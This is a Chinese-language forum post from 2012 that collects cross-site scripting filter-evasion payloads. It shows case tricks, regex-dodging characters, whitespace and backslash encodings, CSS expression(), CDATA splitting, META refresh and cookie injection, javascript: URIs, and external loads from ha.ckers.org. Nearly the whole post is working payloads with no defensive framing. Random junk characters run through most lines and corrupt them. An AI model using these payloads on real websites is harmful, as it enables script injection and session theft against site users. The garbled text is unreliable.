1. 改变字符大小写2 B0 z; x* S* z
+ z5 c& Y8 t6 G2 A
+ f& N& j8 U' i. q
/ o$ o% U( R* h <sCript>alert(‘d’)</scRipT>9 o/ M$ Q( d, p3 d5 L3 J5 P9 d* ~
, N9 o$ X8 v: H) U9 B
2. 利用多加一些其它字符来规避Regular Expression的检查( X A, H& Y9 ^2 \ C+ ~' {: @; H+ z5 F
5 @4 T$ | Y9 b( g/ a <<script>alert(‘c’)//<</script>
3 d2 K: h1 b. G
! x. G7 w2 Y* U- G <SCRIPT a=">" SRC="t.js"></SCRIPT>
1 e2 q4 l# H" j) o
2 i/ W9 V/ J/ X9 R0 P <SCRIPT =">" SRC="t.js"></SCRIPT>
! d( R/ g, y7 b8 E9 l; P! `$ j. p! p( d0 n* B0 r
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
7 ~6 D* D& U" s+ U8 g8 T3 d G( y" d) @/ Z6 m* |1 F6 [2 B) ]$ Q
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
* t- H" A6 I% t# L5 F% w- v# i! I3 U: n( W
<SCRIPT a=`>` SRC="t.js"></SCRIPT>5 W5 z/ o* F, l7 k
& L, L5 K) ^: s9 |2 } T <SCRIPT a=">’>" SRC="t.js"></SCRIPT>& a% d' n. e; i6 z2 h5 ~0 G' s5 [: ~0 z
; z6 b+ D: O( j$ D0 Q3. 以其它扩展名取代.js' f# {0 q5 {3 M! J
4 F s0 K0 a F/ w* J2 b
<script src="bad.jpg"></script>
* G5 W6 T" u) X @. m+ f
& {+ ^8 w* g* ~, W1 ^4. 将Javascript写在CSS档里
* b: Q1 X+ `1 x9 X; i9 `. p: @ g( x4 @
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
. W# B; C: i& S$ O0 ]
, k2 Y# x+ Y4 U/ o1 x example:
3 k8 U% J, H$ [/ N# r9 s
3 U- b/ X) m& Z7 l' |9 b/ m body {. B7 J+ E. b, }$ \
& I, {" Q; U6 ?# e2 ?4 p7 Q% e
background-image: url(‘javascript:alert("XSS");’). Q/ e. E( m/ \
- p9 c8 P: M. i6 i8 u( L- g% V
}
9 g* i9 b+ W4 Z% r8 ?9 T
- \& L, w. a* s9 D, q5. 在script的tag里加入一些其它字符
- c: E( ]( Q* I1 B$ d" [ b; O' L% X5 T) n" l
<SCRIPT/SRC="t.js"></SCRIPT>
0 U5 c, s+ u+ c& a! }( @9 }* H
3 R4 Z# o3 r9 c5 D; U <SCRIPT/anyword SRC="t.js"></SCRIPT> @: I7 Y! `3 ~, p' v, m- O
; O& ~1 c* j) X* T+ D6. 使用tab或是new line来规避
- j# s. ?, Q2 G+ {2 S0 V. M# V/ y3 m
<img src="jav ascr ipt:alert(‘XSS3′)">
( b5 w9 q8 \( r- g( Y1 ~& X! b) F1 H0 h3 g* U4 S% q. E( f0 n
<img src="jav ascr ipt:alert(‘XSS3′)">
$ w' u# Z( q5 H- u2 F' Y
: [. i% k7 n0 }7 }( ?. k6 ]8 R <IMG SRC="jav ascript:alert(‘XSS’);">
# V$ w1 p" S( r/ H
: Q! |! i+ v# v8 P3 K -> tag) ^1 B, E$ C: a) j- q3 S
6 A" R( G/ {& |2 ~6 ` [% e4 {' c( M -> new line3 M- m4 D* a; u/ e7 P- R
+ X, ?2 p- o: J" N4 S& z% Z
7. 使用"\"来规避
6 H4 t: B; S- o; s
) C: d, _% p" X/ q; e! g8 z* D <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
) A4 Y# `0 X& G7 Y; j2 M" [! m% h4 s- v f- x2 m- M: A
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
( Q! L! N) j/ |& L7 q' O: t0 U8 K1 Z# R4 Y. |0 o3 k% u1 }* q9 M
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
) j8 ~& g, g P2 t' v5 u1 P: J$ S! r+ B6 H
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
/ x' Y G" d8 K1 e; n* |( m1 Q" g! }0 d! |( O# ~5 ~6 @9 S; _* G( S# A
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
( \$ `7 Q7 R" M; }& A/ S
( P4 Z: z1 Y: G- F& ]8. 使用Hex encode来规避(也可能会把";"拿掉), |; P8 Z q( T5 F9 ^
3 v5 m6 p6 r/ [, J* E5 e
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">& I# `! k* l" T; Q/ a! U
9 u6 j% O/ g+ c+ v
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">8 G/ Y: D* S- a
7 Y# N6 W1 O+ W, q
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
+ R }5 a$ [7 [. ?8 x: i5 N1 R( B7 n3 J& W3 R5 \" Y
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
4 P* f4 j/ [0 E! D( S( W+ E
& n5 x5 d' u+ v0 A/ y2 X+ B0 R9. script in HTML tag$ r. ~5 z3 U1 H# m6 T
' J( F. u- r9 o8 y
<body onload=」alert(‘onload’)」> M5 J8 J' d1 x& H0 _) g- d
) y( K3 t0 p. A onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload7 e: F" z" Y" n( e
8 H9 _$ {. j% d6 J* x) \10. 在swf里含有xss的code
" f$ g' c2 j+ J5 D& P/ m; o; n3 c ^5 h3 u' t7 p
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
& K U2 j* [7 @( ~# k9 _
5 _5 \5 f! ~; Q11. 利用CDATA将xss的code拆开,再组合起来。
5 L1 M: W7 L) j' z, f4 v
1 H) c1 F. V5 k; n# Y: h% l% t; K <XML ID=I><X><C>0 s: B- z5 e/ {1 }$ W4 V' H. \2 d
9 }/ B. w# C& W4 \ <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>! S# }+ D' y" s) h- ^$ k
) c6 R2 I8 }3 |6 d: l
</C></X>
7 x) k1 S8 g! n3 \5 t8 Z7 l
* x) K' g( X. n: n </xml>
& T1 A% d+ ?3 u n6 B" r; x- `/ t1 y( ]# u7 l- l4 r) }- p
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
* Y$ Z p' O% y5 |/ }% [. b. E, o' z+ _
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
% |" X) l) I2 g& ]# N" _9 A8 p2 m' g. Q! p Z" H+ C+ V5 v
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
6 O- ~) O+ ]8 W) }3 K7 b/ @9 ^
( p2 z8 t$ s; T o12. 利用HTML+TIME。
J5 A& J( R3 h$ J& a* a" _* U. L3 [ Q* L
<HTML><BODY>+ x0 x0 c; w# [3 d" b+ H
2 E; p% z9 u$ T8 o: _4 P/ H <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
0 J. G# g) O7 l( z& z P$ `6 c+ @7 h
<?import namespace="t" implementation="#default#time2">
) K% c: H5 X3 m5 w$ } j# v& Z4 k6 `( N8 n: z3 _- @- R2 Q# T0 A
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
/ |" A \' z9 a7 Y h
. k, j. |, [5 q </BODY></HTML>
- a: M+ x3 m, S, h* ]. W' P- ]' ~8 p7 }. y( \/ T2 t. r& o
13. 透过META写入Cookie。
& _. L0 Z2 v/ {' t X
8 c$ a6 M5 N, y8 C4 l" B! S <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>"># H7 W/ |) a0 B: c3 s
$ n7 E/ H' X# |4 l1 U; i0 D# Y14. javascript in src , href , url
7 |9 A; c' r: W; e$ m6 S. X( x7 A+ I3 ^1 X
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
1 D- j! n2 I6 N1 z( k
0 p4 _8 L3 E {% Y& e <img src="javascript:alert(‘XSS3′)">
% o- h! O* w- [. m* V# O, ^ N
$ Y* z) Q. Z5 F- |<IMG DYNSRC="javascript:alert(‘XSS20′)">/ ?7 T5 w' }$ V0 n1 y! M$ v- C
$ _. G: c. b* D/ {* l" L0 { <IMG LOWSRC="javascript:alert(‘XSS21′)">. ]3 g7 c, J9 H
) h8 C* |' N4 o0 V! T9 Z9 } <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
" D& B2 m0 P' C) ^
6 C! m+ d: e8 u, H2 Y <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>6 R% s6 t9 f) m, W- U, h* J
* }4 c. o+ _9 n ?8 x
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
2 i- C0 _: K H5 m9 Y3 z# f
' ~/ A5 s$ z o9 q <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
+ a7 P8 n- A1 R! K" ^4 t# s) i
) a+ a$ j q8 t9 t! W) ?( g+ X3 ~ <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}$ E7 ]$ W4 s, o% y
s( [ @5 Y7 H5 T
</STYLE><A CLASS=XSS></A>
+ h$ Z" ~) w& T% H# U7 ?+ Z& A/ d3 a! i+ ^9 V4 E
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>/ w; N8 L! o2 x) k4 m
( B9 h T. v- b
|
发表于 2012-12-31 09:59:28
收藏
支持
反对